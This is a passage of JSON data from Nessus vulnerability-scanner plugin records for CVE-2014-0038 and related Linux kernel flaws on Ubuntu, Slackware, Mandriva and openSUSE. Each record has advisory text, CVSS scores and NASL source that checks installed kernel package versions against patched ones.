ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"13.10\", pkgname:\"linux-image-3.11.0-15-generic\", pkgver:\"3.11.0-15.25\")) flag++;\nif (ubuntu_check(osver:\"13.10\", pkgname:\"linux-image-3.11.0-15-generic-lpae\", pkgver:\"3.11.0-15.25\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.11-generic / linux-image-3.11-generic-lpae\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:51:22", "description": "New kernel packages are available for Slackware 14.1 (64-bit) to fix a security issue.", "cvss3": {"score": null, "vector": null}, "published": "2014-02-20T00:00:00", "type": "nessus", "title": "Slackware 14.1 : kernel (SSA:2014-050-03)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:kernel-generic", "p-cpe:/a:slackware:slackware_linux:kernel-headers", "p-cpe:/a:slackware:slackware_linux:kernel-huge", "p-cpe:/a:slackware:slackware_linux:kernel-modules", "p-cpe:/a:slackware:slackware_linux:kernel-source", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2014-050-03.NASL", "href": "https://www.tenable.com/plugins/nessus/72591", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2014-050-03. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72591);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0038\");\n script_bugtraq_id(65255);\n script_xref(name:\"SSA\", value:\"2014-050-03\");\n\n script_name(english:\"Slackware 14.1 : kernel (SSA:2014-050-03)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New kernel packages are available for Slackware 14.1 (64-bit) to fix\na security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.324351\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c340554e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel recvmmsg Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:kernel-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:kernel-huge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:kernel-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"kernel-generic\", pkgver:\"3.10.17\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"kernel-headers\", pkgver:\"3.10.17\", pkgarch:\"x86\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"kernel-huge\", pkgver:\"3.10.17\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"kernel-modules\", pkgver:\"3.10.17\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"kernel-source\", pkgver:\"3.10.17\", pkgarch:\"noarch\", pkgnum:\"2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:51:11", "description": "Multiple vulnerabilities has been found and corrected in the Linux kernel :\n\nThe compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter (CVE-2014-0038).\n\nThe restore_fpu_checking function in arch/x86/include/asm/fpu-internal.h in the Linux kernel before 3.12.8 on the AMD K7 and K8 platforms does not clear pending exceptions before proceeding to an EMMS instruction, which allows local users to cause a denial of service (task kill) or possibly gain privileges via a crafted application (CVE-2014-1438).\n\nThe yam_ioctl function in drivers/net/hamradio/yam.c in the Linux kernel before 3.12.8 does not initialize a certain structure member, which allows local users to obtain sensitive information from kernel memory by leveraging the CAP_NET_ADMIN capability for an SIOCYAMGCFG ioctl call (CVE-2014-1446).\n\nThe updated packages provides a solution for these security issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-02-18T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : kernel (MDVSA-2014:038)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038", "CVE-2014-1438", "CVE-2014-1446"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:cpupower", "p-cpe:/a:mandriva:linux:kernel-firmware", "p-cpe:/a:mandriva:linux:kernel-headers", "p-cpe:/a:mandriva:linux:kernel-server", "p-cpe:/a:mandriva:linux:kernel-server-devel", "p-cpe:/a:mandriva:linux:kernel-source", "p-cpe:/a:mandriva:linux:lib64cpupower-devel", "p-cpe:/a:mandriva:linux:lib64cpupower0", "p-cpe:/a:mandriva:linux:perf", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-038.NASL", "href": "https://www.tenable.com/plugins/nessus/72553", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:038. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72553);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0038\", \"CVE-2014-1438\", \"CVE-2014-1446\");\n script_bugtraq_id(64781, 64954, 65255);\n script_xref(name:\"MDVSA\", value:\"2014:038\");\n\n script_name(english:\"Mandriva Linux Security Advisory : kernel (MDVSA-2014:038)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been found and corrected in the Linux\nkernel :\n\nThe compat_sys_recvmmsg function in net/compat.c in the Linux kernel\nbefore 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to\ngain privileges via a recvmmsg system call with a crafted timeout\npointer parameter (CVE-2014-0038).\n\nThe restore_fpu_checking function in\narch/x86/include/asm/fpu-internal.h in the Linux kernel before 3.12.8\non the AMD K7 and K8 platforms does not clear pending exceptions\nbefore proceeding to an EMMS instruction, which allows local users to\ncause a denial of service (task kill) or possibly gain privileges via\na crafted application (CVE-2014-1438).\n\nThe yam_ioctl function in drivers/net/hamradio/yam.c in the Linux\nkernel before 3.12.8 does not initialize a certain structure member,\nwhich allows local users to obtain sensitive information from kernel\nmemory by leveraging the CAP_NET_ADMIN capability for an SIOCYAMGCFG\nioctl call (CVE-2014-1446).\n\nThe updated packages provides a solution for these security issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel recvmmsg Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:cpupower\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64cpupower-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64cpupower0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"cpupower-3.4.80-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"kernel-firmware-3.4.80-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"kernel-headers-3.4.80-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"kernel-server-3.4.80-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"kernel-server-devel-3.4.80-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"kernel-source-3.4.80-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64cpupower-devel-3.4.80-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64cpupower0-3.4.80-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"perf-3.4.80-1.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:50:04", "description": "The Linux Kernel was updated to version 3.11.10, fixing security issues and bugs :\n\n - floppy: bail out in open() if drive is not responding to block0 read (bnc#773058).\n\n - compat_sys_recvmmsg X32 fix (bnc#860993 CVE-2014-0038).\n\n - HID: usbhid: fix sis quirk (bnc#859804).\n\n - hwmon: (coretemp) Fix truncated name of alarm attributes\n\n - HID: usbhid: quirk for Synaptics Quad HD touchscreen (bnc#859804).\n\n - HID: usbhid: quirk for Synaptics HD touchscreen (bnc#859804).\n\n - HID: usbhid: merge the sis quirk (bnc#859804).\n\n - HID: hid-multitouch: add support for SiS panels (bnc#859804).\n\n - HID: usbhid: quirk for SiS Touchscreen (bnc#859804).\n\n - HID: usbhid: quirk for Synaptics Large Touchccreen (bnc#859804).\n\n - drivers: net: cpsw: fix dt probe for one port ethernet.\n\n - drivers: net: cpsw: fix for cpsw crash when build as modules.\n\n - dma: edma: Remove limits on number of slots.\n\n - dma: edma: Leave linked to Null slot instead of DUMMY slot.\n\n - dma: edma: Find missed events and issue them.\n\n - dma: edma: Write out and handle MAX_NR_SG at a given time.\n\n - dma: edma: Setup parameters to DMA MAX_NR_SG at a time.\n\n - ARM: edma: Add function to manually trigger an EDMA channel.\n\n - ARM: edma: Fix clearing of unused list for DT DMA resources.\n\n - ACPI: Add Toshiba NB100 to Vista _OSI blacklist.\n\n - ACPI: add missing win8 OSI comment to blacklist (bnc#856294).\n\n - ACPI: update win8 OSI blacklist.\n\n - ACPI: blacklist win8 OSI for buggy laptops.\n\n - ACPI: blacklist win8 OSI for ASUS Zenbook Prime UX31A (bnc#856294).\n\n - ACPI: Blacklist Win8 OSI for some HP laptop 2013 models (bnc#856294).\n\n - floppy: bail out in open() if drive is not responding to block0 read (bnc#773058).\n\n - ping: prevent NULL pointer dereference on write to msg_name (bnc#854175 CVE-2013-6432).\n\n - x86/dumpstack: Fix printk_address for direct addresses (bnc#845621).\n\n - Refresh patches.suse/stack-unwind.\n\n - Refresh patches.xen/xen-x86_64-dump-user-pgt.\n\n - KVM: x86: Convert vapic synchronization to _cached functions (CVE-2013-6368) (bnc#853052 CVE-2013-6368).\n\n - KVM: x86: fix guest-initiated crash with x2apic (CVE-2013-6376) (bnc#853053 CVE-2013-6376).\n\n - Build the KOTD against openSUSE:13.1:Update\n\n - xencons: generalize use of add_preferred_console() (bnc#733022, bnc#852652).\n\n - Update Xen patches to 3.11.10.\n\n - Rename patches.xen/xen-pcpu-hotplug to patches.xen/xen-pcpu.\n\n - KVM: x86: Fix potential divide by 0 in lapic (CVE-2013-6367) (bnc#853051 CVE-2013-6367).\n\n - KVM: Improve create VCPU parameter (CVE-2013-4587) (bnc#853050 CVE-2013-4587).\n\n - ipv6: fix headroom calculation in udp6_ufo_fragment (bnc#848042 CVE-2013-4563).\n\n - net: rework recvmsg handler msg_name and msg_namelen logic (bnc#854722).\n\n - patches.drivers/gpio-ucb1400-add-module_alias.patch:\n Update upstream reference\n\n - patches.drivers/gpio-ucb1400-can-be-built-as-a-module.pa tch: Update upstream reference\n\n - Delete patches.suse/ida-remove-warning-dump-stack.patch.\n Already included in kernel 3.11 (WARN calls dump_stack.)\n\n - xhci: Limit the spurious wakeup fix only to HP machines (bnc#852931).\n\n - iscsi_target: race condition on shutdown (bnc#850072).\n\n - Linux 3.11.10.\n\n - Refresh patches.xen/xen3-patch-2.6.29.\n\n - Delete patches.suse/btrfs-relocate-csums-properly-with-prealloc\n -extents.patch.\n\n - patches.drivers/xhci-Fix-spurious-wakeups-after-S5-on-Ha swell.patch: (bnc#852931).\n\n - Build mei and mei_me as modules (bnc#852656)\n\n - Linux 3.11.9.\n\n - Linux 3.11.8 (CVE-2013-4511 bnc#846529 bnc#849021).\n\n - Delete patches.drivers/ALSA-hda-Add-a-fixup-for-ASUS-N76VZ.\n\n - Delete patches.fixes/Fix-a-few-incorrectly-checked-io_-remap_pf n_range-ca.patch.\n\n - Add USB PHY support (needed to get USB and Ethernet working on beagle and panda boards) Add CONFIG_PINCTRL_SINGLE=y to be able to use Device tree (at least for beagle and panda boards) Add ARM SoC sound support Add SPI bus support Add user-space access to I2C and SPI\n\n - patches.arch/iommu-vt-d-remove-stack-trace-from-broken-i rq-remapping-warning.patch: Fix forward porting, sorry.\n\n - iommu: Remove stack trace from broken irq remapping warning (bnc#844513).\n\n - gpio: ucb1400: Add MODULE_ALIAS.\n\n - Allow NFSv4 username mapping to work properly (bnc#838024).\n\n - nfs: check if gssd is running before attempting to use krb5i auth in SETCLIENTID call.\n\n - sunrpc: replace sunrpc_net->gssd_running flag with a more reliable check.\n\n - sunrpc: create a new dummy pipe for gssd to hold open.\n\n - Set CONFIG_GPIO_TWL4030 as built-in (instead of module) as a requirement to boot on SD card on beagleboard xM\n\n - armv6hl, armv7hl: Update config files. Set CONFIG_BATMAN_ADV_BLA=y as all other kernel configuration files have.\n\n - Update config files :\n\n - CONFIG_BATMAN_ADV_NC=y, because other BATMAN_ADV options are all enabled so why not this one.\n\n - CONFIG_GPIO_SCH=m, CONFIG_GPIO_PCH=m, because we support all other features of these pieces of hardware.\n\n - CONFIG_INTEL_POWERCLAMP=m, because this small driver might be useful in specific cases, and there's no obvious reason not to include it.\n\n - Fix a few incorrectly checked [io_]remap_pfn_range() calls (bnc#849021, CVE-2013-4511).\n\n - Linux 3.11.7.", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : kernel (openSUSE-SU-2014:0205-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4511", "CVE-2013-4563", "CVE-2013-4587", "CVE-2013-6367", "CVE-2013-6368", "CVE-2013-6376", "CVE-2013-6432", "CVE-2014-0038"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop", "p-cpe:/a:novell:opensuse:kernel-desktop-base", "p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debugsource", "p-cpe:/a:novell:opensuse:kernel-desktop-devel", "p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-ec2", "p-cpe:/a:novell:opensuse:kernel-ec2-base", "p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debugsource", "p-cpe:/a:novell:opensuse:kernel-ec2-devel", "p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debugsource", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-trace", "p-cpe:/a:novell:opensuse:kernel-trace-base", "p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace-debugsource", "p-cpe:/a:novell:opensuse:kernel-trace-devel", "p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-debugsource", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-114.NASL", "href": "https://www.tenable.com/plugins/nessus/75252", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-114.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75252);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-4511\", \"CVE-2013-4563\", \"CVE-2013-4587\", \"CVE-2013-6367\", \"CVE-2013-6368\", \"CVE-2013-6376\", \"CVE-2013-6432\", \"CVE-2014-0038\");\n script_bugtraq_id(63512, 63702, 64135, 64270, 64291, 64319, 64328, 65255);\n\n script_name(english:\"openSUSE Security Update : kernel (openSUSE-SU-2014:0205-1)\");\n script_summary(english:\"Check for the openSUSE-2014-114 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Linux Kernel was updated to version 3.11.10, fixing security\nissues and bugs :\n\n - floppy: bail out in open() if drive is not responding to\n block0 read (bnc#773058).\n\n - compat_sys_recvmmsg X32 fix (bnc#860993 CVE-2014-0038).\n\n - HID: usbhid: fix sis quirk (bnc#859804).\n\n - hwmon: (coretemp) Fix truncated name of alarm attributes\n\n - HID: usbhid: quirk for Synaptics Quad HD touchscreen\n (bnc#859804).\n\n - HID: usbhid: quirk for Synaptics HD touchscreen\n (bnc#859804).\n\n - HID: usbhid: merge the sis quirk (bnc#859804).\n\n - HID: hid-multitouch: add support for SiS panels\n (bnc#859804).\n\n - HID: usbhid: quirk for SiS Touchscreen (bnc#859804).\n\n - HID: usbhid: quirk for Synaptics Large Touchccreen\n (bnc#859804).\n\n - drivers: net: cpsw: fix dt probe for one port ethernet.\n\n - drivers: net: cpsw: fix for cpsw crash when build as\n modules.\n\n - dma: edma: Remove limits on number of slots.\n\n - dma: edma: Leave linked to Null slot instead of DUMMY\n slot.\n\n - dma: edma: Find missed events and issue them.\n\n - dma: edma: Write out and handle MAX_NR_SG at a given\n time.\n\n - dma: edma: Setup parameters to DMA MAX_NR_SG at a time.\n\n - ARM: edma: Add function to manually trigger an EDMA\n channel.\n\n - ARM: edma: Fix clearing of unused list for DT DMA\n resources.\n\n - ACPI: Add Toshiba NB100 to Vista _OSI blacklist.\n\n - ACPI: add missing win8 OSI comment to blacklist\n (bnc#856294).\n\n - ACPI: update win8 OSI blacklist.\n\n - ACPI: blacklist win8 OSI for buggy laptops.\n\n - ACPI: blacklist win8 OSI for ASUS Zenbook Prime UX31A\n (bnc#856294).\n\n - ACPI: Blacklist Win8 OSI for some HP laptop 2013 models\n (bnc#856294).\n\n - floppy: bail out in open() if drive is not responding to\n block0 read (bnc#773058).\n\n - ping: prevent NULL pointer dereference on write to\n msg_name (bnc#854175 CVE-2013-6432).\n\n - x86/dumpstack: Fix printk_address for direct addresses\n (bnc#845621).\n\n - Refresh patches.suse/stack-unwind.\n\n - Refresh patches.xen/xen-x86_64-dump-user-pgt.\n\n - KVM: x86: Convert vapic synchronization to _cached\n functions (CVE-2013-6368) (bnc#853052 CVE-2013-6368).\n\n - KVM: x86: fix guest-initiated crash with x2apic\n (CVE-2013-6376) (bnc#853053 CVE-2013-6376).\n\n - Build the KOTD against openSUSE:13.1:Update\n\n - xencons: generalize use of add_preferred_console()\n (bnc#733022, bnc#852652).\n\n - Update Xen patches to 3.11.10.\n\n - Rename patches.xen/xen-pcpu-hotplug to\n patches.xen/xen-pcpu.\n\n - KVM: x86: Fix potential divide by 0 in lapic\n (CVE-2013-6367) (bnc#853051 CVE-2013-6367).\n\n - KVM: Improve create VCPU parameter (CVE-2013-4587)\n (bnc#853050 CVE-2013-4587).\n\n - ipv6: fix headroom calculation in udp6_ufo_fragment\n (bnc#848042 CVE-2013-4563).\n\n - net: rework recvmsg handler msg_name and msg_namelen\n logic (bnc#854722).\n\n - patches.drivers/gpio-ucb1400-add-module_alias.patch:\n Update upstream reference\n\n -\n patches.drivers/gpio-ucb1400-can-be-built-as-a-module.pa\n tch: Update upstream reference\n\n - Delete patches.suse/ida-remove-warning-dump-stack.patch.\n Already included in kernel 3.11 (WARN calls dump_stack.)\n\n - xhci: Limit the spurious wakeup fix only to HP machines\n (bnc#852931).\n\n - iscsi_target: race condition on shutdown (bnc#850072).\n\n - Linux 3.11.10.\n\n - Refresh patches.xen/xen3-patch-2.6.29.\n\n - Delete\n patches.suse/btrfs-relocate-csums-properly-with-prealloc\n -extents.patch.\n\n -\n patches.drivers/xhci-Fix-spurious-wakeups-after-S5-on-Ha\n swell.patch: (bnc#852931).\n\n - Build mei and mei_me as modules (bnc#852656)\n\n - Linux 3.11.9.\n\n - Linux 3.11.8 (CVE-2013-4511 bnc#846529 bnc#849021).\n\n - Delete\n patches.drivers/ALSA-hda-Add-a-fixup-for-ASUS-N76VZ.\n\n - Delete\n patches.fixes/Fix-a-few-incorrectly-checked-io_-remap_pf\n n_range-ca.patch.\n\n - Add USB PHY support (needed to get USB and Ethernet\n working on beagle and panda boards) Add\n CONFIG_PINCTRL_SINGLE=y to be able to use Device tree\n (at least for beagle and panda boards) Add ARM SoC sound\n 